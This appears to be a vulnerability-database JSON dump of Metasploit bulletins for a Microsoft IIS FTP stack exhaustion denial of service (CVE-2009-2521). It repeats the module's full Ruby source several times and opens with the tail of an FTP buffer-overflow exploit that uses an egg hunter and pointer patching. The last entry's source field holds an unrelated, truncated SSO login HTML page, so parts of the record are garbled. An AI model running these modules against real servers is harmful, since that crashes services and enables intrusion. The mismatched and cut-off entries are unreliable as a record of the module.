egg hunter\n pst[ 90, 4] = [target['Patch']].pack('V') # patch smashed pointers\n pst[ 94, 4] = [target['Patch']].pack('V')\t# patch smashed pointers\n pst[140, 32] = [target['Patch']].pack('V') * 8 # patch smashed pointers\n pst[158, 4] = [target.ret].pack(\"V\") # return\n pst[182, 5] = \"\\xe9\" + [-410].pack(\"V\") # jmp back\n\n # Escape each 0xff with another 0xff for FTP\n pst = pst.gsub(\"\\xff\", \"\\xff\\xff\")\n\n print_status(\"Creating long directory...\")\n res = send_cmd( ['MKD', pre+pst ], true )\n print_status(res.strip)\n\n srv\t = Rex::Socket::TcpServer.create(\n 'LocalHost' => '0.0.0.0',\n 'LocalPort' => 0,\n 'SSL' => false,\n 'Context' => {\n 'Msf' => framework,\n 'MsfExploit' => self,\n }\n )\n\n add_socket(srv)\n\n begin\n\n thr = framework.threads.spawn(\"Module(#{self.refname})-Listener\", false) { srv.accept }\n\n prt = srv.getsockname[2]\n prt1 = prt / 256\n prt2 = prt % 256\n\n addr = Rex::Socket.source_address(rhost).gsub(\".\", \",\") + \",#{prt1},#{prt2}\"\n\n res = send_cmd( ['PORT', addr ], true )\n print_status(res.strip)\n\n print_status(\"Trying target #{target.name}...\")\n\n res = send_cmd( ['NLST', pre+pst + \"*/../\" + pre + \"*/\"], true )\n print_status(res.strip) if res\n\n select(nil,nil,nil,2)\n\n handler\n disconnect\n\n ensure\n thr.kill\n srv.close\n\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-07T15:33:28", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 98}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "1701ea7952a28f6b5c71b539ce24ebf2", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.\n", "published": "2011-11-26T19:30:35", "modified": "2019-05-23T12:01:21", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:N/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2521", "http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html"], "cvelist": ["CVE-2009-2521"], "lastseen": "2019-09-07T17:10:05", "history": [], "viewCount": 131, "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2019-09-07T17:10:05"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "seebug", "idList": ["SSV:12236", "SSV:12477"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310900944", "OPENVAS:900944", "OPENVAS:1361412562310900874", "OPENVAS:900874"]}, {"type": "exploitdb", "idList": ["EDB-ID:9587", "EDB-ID:17476"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}, {"type": "mskb", "idList": ["KB975254"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}], "modified": "2019-09-07T17:10:05"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-07T17:10:05", "differentElements": ["sourceData"], "edition": 99}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "63880e80d9ab8ef7c9ba96cc0415c260", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.\n", "published": "2011-11-26T19:30:35", "modified": "2019-05-23T12:01:21", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:N/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2521", "http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html"], "cvelist": ["CVE-2009-2521"], "lastseen": "2019-09-07T23:02:05", "history": [], "viewCount": 131, "enchantments": {"score": {"value": 6.4, "vector": "NONE", "modified": "2019-09-07T23:02:05"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "seebug", "idList": ["SSV:12236", "SSV:12477"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "exploitdb", "idList": ["EDB-ID:17476", "EDB-ID:9587"]}, {"type": "openvas", "idList": ["OPENVAS:900944", "OPENVAS:1361412562310900944", "OPENVAS:1361412562310900874", "OPENVAS:900874"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}, {"type": "mskb", "idList": ["KB975254"]}], "modified": "2019-09-07T23:02:05"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-07T23:02:05", "differentElements": ["sourceData"], "edition": 100}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "1701ea7952a28f6b5c71b539ce24ebf2", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.\n", "published": "2011-11-26T19:30:35", "modified": "2019-05-23T12:01:21", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:N/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2521", "http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html"], "cvelist": ["CVE-2009-2521"], "lastseen": "2019-09-08T01:18:48", "history": [], "viewCount": 131, "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2019-09-08T01:18:48"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "seebug", "idList": ["SSV:12236", "SSV:12477"]}, {"type": "exploitdb", "idList": ["EDB-ID:9587", "EDB-ID:17476"]}, {"type": "openvas", "idList": ["OPENVAS:900944", "OPENVAS:1361412562310900944", "OPENVAS:1361412562310900874", "OPENVAS:900874"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}, {"type": "mskb", "idList": ["KB975254"]}], "modified": "2019-09-08T01:18:48"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-08T01:18:48", "differentElements": ["modified", "published"], "edition": 101}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "a8492c8896a6140c62316ed6beef901b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:N/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2521", "http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html"], "cvelist": ["CVE-2009-2521"], "lastseen": "2019-09-19T12:32:08", "history": [], "viewCount": 131, "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2019-09-19T12:32:08"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "seebug", "idList": ["SSV:12236", "SSV:12477"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310900944", "OPENVAS:900944", "OPENVAS:1361412562310900874", "OPENVAS:900874"]}, {"type": "exploitdb", "idList": ["EDB-ID:17476", "EDB-ID:9587"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}, {"type": "mskb", "idList": ["KB975254"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}], "modified": "2019-09-19T12:32:08"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-19T12:32:08", "differentElements": ["modified", "published"], "edition": 102}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "1701ea7952a28f6b5c71b539ce24ebf2", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.\n", "published": "2011-11-26T19:30:35", "modified": "2019-05-23T12:01:21", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:N/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2521", "http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html"], "cvelist": ["CVE-2009-2521"], "lastseen": "2019-09-19T14:35:48", "history": [], "viewCount": 135, "enchantments": {"score": {"value": 6.3, "vector": "NONE", "modified": "2019-09-19T14:35:48"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "seebug", "idList": ["SSV:12236", "SSV:12477"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/UNIX/MISC/ZABBIX_AGENT_EXEC"]}, {"type": "openvas", "idList": ["OPENVAS:900944", "OPENVAS:1361412562310900944", "OPENVAS:900874", "OPENVAS:1361412562310900874"]}, {"type": "exploitdb", "idList": ["EDB-ID:9587", "EDB-ID:17476"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}, {"type": "mskb", "idList": ["KB975254"]}], "modified": "2019-09-19T14:35:48"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-19T14:35:48", "differentElements": ["sourceData"], "edition": 103}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "2ee9b125a4e82833825118f3d5e9a31c", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.\n", "published": "2011-11-26T19:30:35", "modified": "2019-05-23T12:01:21", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:N/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2521", "http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html"], "cvelist": ["CVE-2009-2521"], "lastseen": "2019-10-01T00:25:51", "history": [], "viewCount": 135, "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2019-10-01T00:25:51"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "seebug", "idList": ["SSV:12236", "SSV:12477"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "exploitdb", "idList": ["EDB-ID:9587", "EDB-ID:17476"]}, {"type": "openvas", "idList": ["OPENVAS:900944", "OPENVAS:1361412562310900944", "OPENVAS:1361412562310900874", "OPENVAS:900874"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}, {"type": "mskb", "idList": ["KB975254"]}], "modified": "2019-10-01T00:25:51"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">\n<html>\n\t<head>\n\t\t<title>sso login check</title>\n\t\t\n\t\t<meta charset=\"utf-8\"/>\n\t\t<meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\" />\n\t\t<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" />\n\t\t<meta http-equiv=\"CACHE-CONTROL\" content=\"NO-CACHE\" />\n\t\t<meta http-equiv=\"PRAGMA\" content=\"NO-CACHE\" />\n\t\t<meta http-equiv=\"EXPIRES\" content=\"0\" />\n\t</head>\n \t<body>\n \t<script src=\"http://127.0.0.1:12381/auth\" language=\"javascript\" type=\"text/javascript\"></script> \n\t\t<script language=\"javascript\" type=\"text/javascript\">\n\t\t\tfunction getOrigURLParamValue() \n\t\t\t{\n\t\t\t\tvar orig_url_param = 'orig_url=';\n\t\t\t\tvar decodedUrlParameters = decodeURIComponent(location.search);\n\t\t\t\tvar decodedOrigParam = (new RegExp(orig_url_param + '.*').exec(decodedUrlParameters)||[,\"\"])[0].replace(orig_url_param, '').replace(/\\+/g, '%20')||null;\n\t\t\t\tvar encodedOrigParam = encodeURIComponent(decodedOrigParam);\n\n\t\t\t\t//console.log('Decoded URL Params: ' + decodedUrlParameters);\n\t\t\t\t//console.log('decodedOrigParam: ' + decodedOrigParam);\n\t\t\t\t//console.log('encodedOrigParam: ' + encodedOrigParam);\n\n\t\t\t\treturn encodedOrigParam;\n\n\t\t\t}\n\n\t\t\tfunction empty(str)\n\t\t\t{\t\n\t\t\t\treturn !str || !/[^\\s]+/.test(str);\n\t\t\t}\n\t\t\t\n\t\t\tvar encodedOrigUrl = getOrigURLParamValue();\n\t\t\t\n\t\t\ttry\n\t\t\t{\n\t\t\t\tif(typeof(gCtchLogonInfo) !== 'undefined')\n\t\t\t\t{\t \t\n\t\t\t\t\tvar modified_redirect_url = \"https://\" + window.location.hostname +'/EUP/transparent_login/?orig_url=' + encodedOrigUrl + '&winUserId=' +gCtchLogonInfo.winUserId ;\n\t\t\t\t\tif (!empty(gCtchLogonInfo.orgName))\n\t\t\t\t\t{\n\t\t\t\t\t\tmodified_redirect_url = modified_redirect_url.concat(\"&orgName=\",gCtchLogonInfo.orgName);\n\t\t\t\t\t}\n\t\t\t\t\tif (!empty(gCtchLogonInfo.userName))\n\t\t\t\t\t{\n\t\t\t\t\t\tmodified_redirect_url = modified_redirect_url.concat(\"&userName=\",gCtchLogonInfo.userName);\n\t\t\t\t\t}\n\t\t\t\t\t\n\t\t\t\t\tdocument.location.href = 